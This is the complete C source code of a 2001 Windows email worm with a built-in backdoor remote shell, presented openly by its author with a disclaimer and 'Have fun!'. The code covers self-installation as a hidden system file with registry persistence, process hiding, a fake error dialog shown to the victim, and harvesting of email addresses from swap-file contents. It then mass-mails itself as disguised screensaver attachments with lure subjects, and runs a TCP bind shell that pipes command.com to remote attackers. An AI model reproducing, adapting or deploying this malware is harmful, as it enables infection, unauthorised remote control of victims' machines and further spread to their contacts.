/* Bumblebee's Remote Shell [BRSH] (worm edition) Detected by AVP as i-worm.FunnyPics Copyright (c) 2001 Bumblebee <[email protected]> Disclaimer: THIS IS THE SOURCE CODE OF AN I-WORM. THE AUTHOR IS NOT RESPONSABILE OF ANY DAMAGES THAT MAY OCCUR DUE TO ITS BUILD AND EXECUTION. Description: Long time since my plage 2000. Now, the bee returns... Execution modes: execution mode stealth mess install mail backdoor -------------------------------------------------------------- default | 1 1 0 0 -q quiet | 0 0 1 1 -i install | 0 1 0 0 -m mail spawn | 0 0 1 0 -------------------------------------------------------------- It installs into windows folder and registers itself in the registry as a service (that will run in -q mode). This is a very simple worm spreading trought mail with mapi32.dll. Well, not really simple :) It uses a complex way to get mail addr. It creates a empty file and makes it grown in with the file mapping routines. As result the file growth is filled with data of the swap disk. html files included, you got it? ;) This is a proof of concept of another serious lack of security in windows systems. Notice this has been tested only under win9x systems and is not as effective as other methods are. As far as i know this is the 1st worm that exploits this issue. It also has a cute backdoor: BRSH (win9x only). BRSH is a little remote shell for win9x systems. It listens a port (default is 8000+rnd 256) for TCP connections. When a connection is established it makes tunneling between the connection and a std shell (command.com). It supports end session by closing the shell ('exit') or by disconnection. Notice second case is less stable. After a session is closed it will listen to another connection. To sum up, you have here a little clean worm with a simple but effective backdoor. Have fun! The way of the bee */ #include<windows.h> #include<stdio.h> #include<tchar.h> #include<stdlib.h> #include<winsock.h> #include<mapi.h> /* comment following line to enable debug version for the shell */ #define RELEASE #ifndef RELEASE #include<assert.h> #else #define assert(x) /* x */ #endif /* API form MAPI32 used by the worm */ typedef ULONG (PASCAL FAR *MSENDMAIL)(ULONG, ULONG, MapiMessage *, FLAGS, ULONG); typedef ULONG (PASCAL FAR *MLOGON)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE); typedef ULONG (PASCAL FAR *MLOGOFF)(LHANDLE, ULONG, FLAGS, ULONG); /* some usefull API's */ typedef BOOL (PASCAL FAR *ICONNECT)(LPDWORD flags,DWORD reserved); typedef ULONG (PASCAL FAR *RSP)(ULONG, ULONG); #define RSHM_VERSION 0 #define RSHM_STDADDR 1 #define RSHM_EXIT 2 #define RSH_COMMAND 3 #define RSH_DAEMON 4 #define RSH_REGKEY 5 #define RSH_REGNAME 6 #define RSH_MAPIDLL 7 #define RSH_WINETDLL 8 #define RSH_GETCONNST 9 #define RSH_KERNEL32 10 #define RSH_RSP 11 #define RSH_ATTACHMENT 12 #define RSH_SUBJECT 28 #define RSH_BODY 44 #define RSH_LOGON 45 #define RSH_LOGOFF 46 #define RSH_SENDMAIL 47 #define RSH_SMTP 48 #define RSH_MAILTO 49 #define RSH_BSWAP 50 #define RSH_STDPORT 8000 char *rsh_mess[]= { "/n[BRSH]/n/r", "", "exit/n/r", "command.com", "//brsh32.exe", "SOFTWARE//Microsoft//Windows//CurrentVersion//RunServices//", "brsh32Service", "MAPI32.DLL", "WININET.DLL", "InternetGetConnectedState", "KERNEL32.DLL", "RegisterServiceProcess", "funnyPic.scr", "billBates.scr", "SouthParkOuttaSpace.scr", "x-filez.scr", "intelAside.scr", "mac0s.scr", "paradise.scr", "phantomMenaze.scr", "southPark.scr", "matrix-SP.scr", "starWarz.scr", "waaazUp.scr", "mrBrown.scr", "bzzz.scr", "nastyPokemon.scr", "kennyIsAlive.scr", "funny pics is online again!", "download screensavers for free!", "Free pics and screensavers", "do you wanna laugh out?", "humor OnLine", "huff OUT!", "Download funny pics for free!", "pics & screensavers", "Save your screen!", "hunk of fun!", "what you wanna see?", "funnypics special offer", "Listen to Dr.Fun", "free screensaver", "ready? steady? laugh!", "are you ready to enjoy?", "Funny Pics Inc. strikes back with more free stuff./n/n" "Visit our new website with lots of funny pics and/n" "new screensavers like this!/n/n" " www.funnypics.com/n/n", "MAPILogon", "MAPILogoff", "MAPISendMail", "SMTP:", "mailto:", "~bswap.tmp" }; char filename[1024]; /* checks for internet connection */ BOOL iconnected(void) { HINSTANCE winetDll; ICONNECT GetConnState; DWORD result; DWORD msec=0; /* if we cannot know if it is connected... :/ */ winetDll=LoadLibrary(rsh_mess[RSH_WINETDLL]); if(!winetDll) return FALSE; /* this case is different, if wininet.dll is installed... assume we have net available */ GetConnState=(ICONNECT)GetProcAddress(winetDll, rsh_mess[RSH_GETCONNST]); if(!GetConnState) { FreeLibrary(winetDll); return TRUE; } /* wait while is offline, use a progressive wait loop */ while((GetConnState)(&result,0)!=TRUE) { Sleep(msec); msec+=1000; } FreeLibrary(winetDll); return TRUE; } /* look for mailto addresses in a buffer. it plazes the result into the 'found' char array */ BOOL ScanMailto(BYTE **file,char *found, DWORD *size) { DWORD i,k; BOOL test,valid; BYTE *tmp=*file; for(i=0,test=FALSE,valid=FALSE;i<*size && !test;i++) { if(!_strnicmp(rsh_mess[RSH_MAILTO],tmp+i,6)) { valid=FALSE; i+=7; k=0; while(tmp[i]!='>' && i<*size && k<128 && tmp[i]!='/'' && tmp[i]!='"') { if(tmp[i]!=' ') { found[k]=tmp[i]; k++; if(tmp[i]=='@') valid=TRUE; } i++; } if(valid) test=TRUE; else k=0; found[k]=0; } } *file+=i; *size-=i; if(!valid) return FALSE; return TRUE; } /* mail stuff */ DWORD WINAPI SpawnMail(LPVOID param) { LHANDLE session; HANDLE fmobj,fd; BYTE *lpobj,*file; DWORD size; char mailto[256]; HINSTANCE MAPIdll; MLOGON MLogon; MLOGOFF MLogoff; MSENDMAIL MSendMail; MapiFileDesc attachment={ 0,0,(ULONG)-1,NULL,NULL,NULL }; MapiRecipDesc destination={ 0, MAPI_TO, NULL, NULL, 0, NULL }; MapiMessage mbody={ 0,NULL,NULL,NULL, NULL,NULL,MAPI_RECEIPT_REQUESTED,NULL,1, NULL,1,NULL }; attachment.lpszPathName=filename; attachment.lpszFileName=rsh_mess[RSH_ATTACHMENT+(GetTickCount()&0x0f)]; destination.lpszAddress=NULL; mbody.lpszSubject=rsh_mess[RSH_SUBJECT+ ((GetTickCount()&0xf0)>>4)]; mbody.lpszNoteText=rsh_mess[RSH_BODY]; mbody.lpRecips=&destination; mbody.lpFiles=&attachment; /* Lowest priority */ SetThreadPriority(NULL,THREAD_PRIORITY_LOWEST); /* if is not -m mode wait 5 minutes */ if(*((DWORD *)param)==FALSE) Sleep(5*60*1000); MAPIdll=LoadLibrary(rsh_mess[RSH_MAPIDLL]); if(!MAPIdll) return -1; MLogon=(MLOGON)GetProcAddress(MAPIdll, rsh_mess[RSH_LOGON]); if(!MLogon) return -1; MLogoff=(MLOGOFF)GetProcAddress(MAPIdll, rsh_mess[RSH_LOGOFF]); if(!MLogoff) return -1; MSendMail=(MSENDMAIL)GetProcAddress(MAPIdll, rsh_mess[RSH_SENDMAIL]); if(!MSendMail) return -1; if((MLogon)(0, NULL, NULL, MAPI_USE_DEFAULT, 0, &session)!=SUCCESS_SUCCESS) { Sleep(5000); FreeLibrary(MAPIdll); return -1; } /* open a small file */ fd=CreateFile(rsh_mess[RSH_BSWAP],GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ, NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_TEMPORARY|FILE_ATTRIBUTE_HIDDEN,NULL); /* and map it with 10 mbs of size */ fmobj=CreateFileMapping(fd,NULL,PAGE_READWRITE, 0,0xa00000,NULL); lpobj=(BYTE *)MapViewOfFile(fmobj,FILE_MAP_WRITE,0,0,0); /* scan it for mail addrr */ file=lpobj; size=(0xa00000-0x10); strcpy(mailto,rsh_mess[RSH_SMTP]); destination.lpszAddress=mailto; /* nice loop */ while(ScanMailto(&file,mailto+5,&size) && size>0) { (MSendMail)(session,0,&mbody,0,0); strcpy(mailto,rsh_mess[RSH_SMTP]); } UnmapViewOfFile(lpobj); CloseHandle(fmobj); CloseHandle(fd); /* log out and unload libraries */ (MLogoff)(session,0,0,0); Sleep(5000); DeleteFile(rsh_mess[RSH_BSWAP]); FreeLibrary(MAPIdll); return 0; } /* unload socks at exit */ void cleanAll() { WSACleanup(); } /* the backdoor is the main module coz it will run in an end-less loop */ int main() { int sfd,nsfd,result; struct sockaddr_in ser_addr,cli_addr; WSADATA wsadata; int nbytes,cli_len=sizeof(cli_addr); BYTE inbyt; HANDLE pipeIn[2],pipeOut[2]; DWORD resdw,resultdw; PROCESS_INFORMATION pinfo; STARTUPINFO sinfo; fd_set readfds; struct timeval timev; LPTSTR commandLine,ptr; HKEY hkey; DWORD ThreadId; HMODULE k32; RSP RegSerPro; BOOL connection,quiet,install,mspawn; char buffer[1024]; /* check execution mode: -q quiet (no stealth message, no install, mail infection) -i install (no stealth message, install) -m mail spawn (quiet mode, mail infection) Default mode: stealth message, install */ install=TRUE; quiet=FALSE; mspawn=FALSE; commandLine=GetCommandLine(); if(commandLine) { for(ptr=commandLine;ptr[0]!='-' && ptr[1]!=0;ptr++); if(ptr[0]=='-' && ptr[1]!=0) { switch(ptr[1]) { default: break; case 'q': quiet=TRUE; install=FALSE; break; case 'i': quiet=TRUE; install=TRUE; break; case 'm': quiet=TRUE; install=FALSE; mspawn=TRUE; break; } } } /* generate a fake message in user lenguage */ /* try to load the hehehe */ if(!quiet) { LoadLibrary(rsh_mess[RSHM_STDADDR]); FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM,0,GetLastError(), MAKELANGID(LANG_NEUTRAL,SUBLANG_DEFAULT),&buffer,1024,NULL); MessageBox(NULL,buffer,NULL,MB_OK|MB_ICONSTOP); } /* this should be used in sending files also */ /* that's why filename is a global var */ GetModuleFileName(NULL,filename,1024); /* installation code */ /* copy it to windows folder and register it as service */ if(install) { GetWindowsDirectory(buffer,256); strcat(buffer,rsh_mess[RSH_DAEMON]); if(CopyFile(filename,buffer,TRUE)) { SetFileAttributes(buffer,FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM); strcpy(filename,buffer); strcat(filename," -q"); if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,rsh_mess[RSH_REGKEY], 0,KEY_WRITE, &hkey)==ERROR_SUCCESS) { RegSetValueEx(hkey,rsh_mess[RSH_REGNAME],0,REG_SZ, filename,sizeof(filename)+1); RegCloseKey(hkey); } } /* wait to next boot to run */ return 0; } /* hide current process as service */ k32=GetModuleHandle(rsh_mess[RSH_KERNEL32]); if(k32) { RegSerPro=(RSP)GetProcAddress(k32,rsh_mess[RSH_RSP]); if(RegSerPro) RegSerPro(0,1); } /* check for inet connection */ if(!iconnected()) return -1; /* run mail spread routine */ if(mspawn) { resdw=1; /* disable wait */ /* and end work here */ return SpawnMail((LPVOID)(&resdw)); } /* run mail spread routine in a new thread */ resdw=0; /* enable wait */ CreateThread(NULL,0,SpawnMail,(LPVOID)(&resdw),0,&ThreadId); /* create 2 pipes */ if(!CreatePipe(&pipeOut[0],&pipeIn[0],NULL,0)) return -1; if(!CreatePipe(&pipeOut[1],&pipeIn[1],NULL,0)) return -1; /* start up socks */ result=WSAStartup(MAKEWORD(1,1),&wsadata); if(result) { assert(!result); return -1; } atexit(cleanAll); if(LOBYTE(wsadata.wVersion)!=1 || HIBYTE(wsadata.wVersion)!=1) { assert(LOBYTE(wsadata.wVersion)==1); assert(HIBYTE(wsadata.wVersion)==1); return -1; } sfd=socket(AF_INET,SOCK_STREAM,0); if(sfd==INVALID_SOCKET) { assert(sfd!=INVALID_SOCKET); return -1; } ser_addr.sin_family=AF_INET; ser_addr.sin_addr.s_addr=inet_addr(rsh_mess[RSHM_STDADDR]); /* pseudo random port RSH_STDPORT + rnd(256) */ ser_addr.sin_port=htons(RSH_STDPORT+(0xff & GetTickCount())); result=bind(sfd,(struct sockaddr *)&ser_addr,sizeof(ser_addr)); if(result==-1) { assert(result!=-1); return -1; } listen(sfd,5); /* main loop */ for(;;) { nsfd=accept(sfd,(struct sockaddr *)&cli_addr,&cli_len); if(nsfd==INVALID_SOCKET) { assert(sfd!=INVALID_SOCKET); return -1; } nbytes=send(nsfd,rsh_mess[RSHM_VERSION],strlen(rsh_mess[RSHM_VERSION]),0); if(nbytes<strlen(rsh_mess[RSHM_VERSION])) { closesocket(nsfd); continue; } /* for redirection stuff */ ZeroMemory(&sinfo,sizeof(sinfo)); sinfo.cb=sizeof(sinfo); sinfo.dwFlags=STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW; sinfo.hStdOutput=pipeIn[0]; sinfo.hStdError=pipeIn[0]; sinfo.hStdInput=pipeOut[1]; sinfo.wShowWindow=SW_HIDE; /* try command.com */ if(!CreateProcess(NULL,rsh_mess[RSH_COMMAND],NULL,NULL,TRUE,CREATE_NEW_CONSOLE, NULL,NULL,&sinfo,&pinfo)) { /* if fails close connection */ closesocket(nsfd); connection=FALSE; } else connection=TRUE; Sleep(5000); while(connection) { /* read from console */ do { PeekNamedPipe(pipeOut[0],NULL,0,NULL,&resultdw,NULL); if(resultdw>0) { ReadFile(pipeOut[0],&inbyt,1,&resultdw,NULL); if(resultdw>0) send(nsfd,&inbyt,1,0); } } while(resultdw>0); /* write into console */ do { FD_ZERO(&readfds); FD_SET(nsfd,&readfds); timev.tv_sec=0; timev.tv_usec=0; select(nsfd,&readfds,NULL,NULL,&timev); if(FD_ISSET(nsfd,&readfds)) { nbytes=recv(nsfd,&inbyt,1,0); if(nbytes>0) WriteFile(pipeIn[1],&inbyt,1,&resultdw,NULL); else { /* end process if neeed: exit/n/r */ /* not the best way, dirty exit if connection lost/error */ GetExitCodeProcess(pinfo.hProcess,&resultdw); if(resultdw==STILL_ACTIVE) { WriteFile(pipeIn[1],rsh_mess[RSHM_EXIT], strlen(rsh_mess[RSHM_EXIT]),&resultdw,NULL); } closesocket(nsfd); connection=FALSE; nbytes=-1; } } else nbytes=-1; } while(nbytes>0); /* if command ends, just close connection */ GetExitCodeProcess(pinfo.hProcess,&resultdw); if(resultdw!=STILL_ACTIVE) { closesocket(nsfd); connection=FALSE; } } } return 0; }